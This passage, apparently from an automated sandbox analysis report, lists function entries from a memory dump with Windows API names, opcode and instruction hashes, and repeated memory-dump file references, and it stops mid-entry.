                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2780335769-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ce0a1e9b89da8c582d0725fbd11fd513ed84fd7ce4f909c8e640cca0bbf582de
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ab1463016aae098240cfde50f225ca52eb6dc98508d9d3cb65698f5a7addffb3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce0a1e9b89da8c582d0725fbd11fd513ed84fd7ce4f909c8e640cca0bbf582de
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2518327E186418AFB10CFB0D4513BD33A2BB49B98F10A535DE4D9B689EF39D452E306
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1452418845-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bbd3b8ba5c4b27b365bd4a2e4f7617ab8f70cbce2ec9e80b5769bfa1af1ddc25
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b2c43708cace3e48dc8d12f196e5a7c33c950d27459c382ac5f7f2eb241c0b89
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbd3b8ba5c4b27b365bd4a2e4f7617ab8f70cbce2ec9e80b5769bfa1af1ddc25
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7316D13E0810346EB50ABA4DA5A3B93691AF83344F407134E94DC72DBDEAEA456A34F
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1279662727-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ac9b60a2d89b0b0a1de2f8cf3a80ca4050063b0902c77aa6c040af4779bb7447
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 869f55a52e71a11f0a4d84b03addf4b5dc538f3e718cddf5ba518e2b4e907663
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac9b60a2d89b0b0a1de2f8cf3a80ca4050063b0902c77aa6c040af4779bb7447
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F441B123D1878283F7148B21D5003697361FB967A4F10E334E69C87AD2EF7DA5B29706
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e6b31fcbb010569d964db91d6e465c54053a5eb593f9b70391a20bf1ad845ba7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dee623516ddf26b247269cbea49b3badc859320569c5ea0f2cf8a2e806917427
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6b31fcbb010569d964db91d6e465c54053a5eb593f9b70391a20bf1ad845ba7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6511A63B0824247EB24AD2594087FA7181BF46BA4F046738DD6CC37D5CF7ED422A607
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3548387204-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1e90ea8750eee40ec6509e71a0aeef04b9b8875fa73e4f4fdef0a793ea833389
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8bd5fe43c2504dadf6a09be62404d528656c42996362bcb666d71850c8be2a4b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e90ea8750eee40ec6509e71a0aeef04b9b8875fa73e4f4fdef0a793ea833389
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96118B82E1860752FB1477B54A5A3BA31806F93300F406434E90EC61DBAD9FB8A7726B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6E1B49ED5,?,?,00000000,00007FF6E1B49F8A), ref: 00007FF6E1B4A0C6
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6E1B49ED5,?,?,00000000,00007FF6E1B49F8A), ref: 00007FF6E1B4A0D0
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1687624791-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 92f4f4d1d4744ab8e3e5075f9c3f1c4e1aa1a51ff1876d4144c1ee488cb6abae
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 49ca92f424fffcfc56a0abcd7ba5f192bb706eecdaa58db61fc4400c3b3b1a7e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92f4f4d1d4744ab8e3e5075f9c3f1c4e1aa1a51ff1876d4144c1ee488cb6abae
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE21D423F1865240FB605771945037C36925F4ABA0F84A239D96FC73C5EF6EA446630B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF6E1B4B7CD), ref: 00007FF6E1B4B680
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF6E1B4B7CD), ref: 00007FF6E1B4B68A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c2ae5bf7dfd723bcaf49b473343ea681dff7813d4b8ca545b941fb3c7d872366
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8c4d77e1e1c8269cb3a8ca7081575819f9eb784ab5042e021020f2f59fcc8673
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2ae5bf7dfd723bcaf49b473343ea681dff7813d4b8ca545b941fb3c7d872366
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0110162B18A8281DB208B25E500269B361BB46FF4F949331EE7D8B7E9DF3DD0118705
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E1B448C1), ref: 00007FF6E1B449DF
                                                                                                                                                                                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E1B448C1), ref: 00007FF6E1B449F5
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1707611234-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 76a0f45c7603eb3144ff1d93a1bd9f2a60a94205705e5cf30b36b262cefc7e5d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cbdf839adbcab933b815b91ada537237048f06a44c4123ac1655f2cd8a0edcf8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76a0f45c7603eb3144ff1d93a1bd9f2a60a94205705e5cf30b36b262cefc7e5d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E11E37360C65282EB508B14E41123AB7A1FB867B1F502235F69DC59D8FF2ED025EB05
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6E1B51E72,?,?,?,00007FF6E1B51EAF,?,?,00000000,00007FF6E1B52375,?,?,?,00007FF6E1B522A7), ref: 00007FF6E1B49E5E
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6E1B51E72,?,?,?,00007FF6E1B51EAF,?,?,00000000,00007FF6E1B52375,?,?,?,00007FF6E1B522A7), ref: 00007FF6E1B49E68
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 588628887-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 90a3e1b0ca63f129125972b75d02b7296718c6d583bf4673ea5362494b00de43
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7a2b2e21f67f920174a48ad2a18819e6d24dc15a93144e978429c30b1a8e8b6d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90a3e1b0ca63f129125972b75d02b7296718c6d583bf4673ea5362494b00de43
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74E08652F5820243FF249BF1D88533532525F8AB40B44B034C94ED6252EF2D645BA20A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cd414821b6f546225101efcda0891026701ff68dd4107860c76c66003ece607e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d732eff612976a6520fdf58725eb3222d82773ea5fda906d0474ea4a32e0b0dc
